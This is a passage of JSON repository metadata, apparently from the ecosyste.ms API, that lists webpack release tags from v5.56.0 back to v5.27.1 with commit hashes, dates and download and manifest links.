rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f2272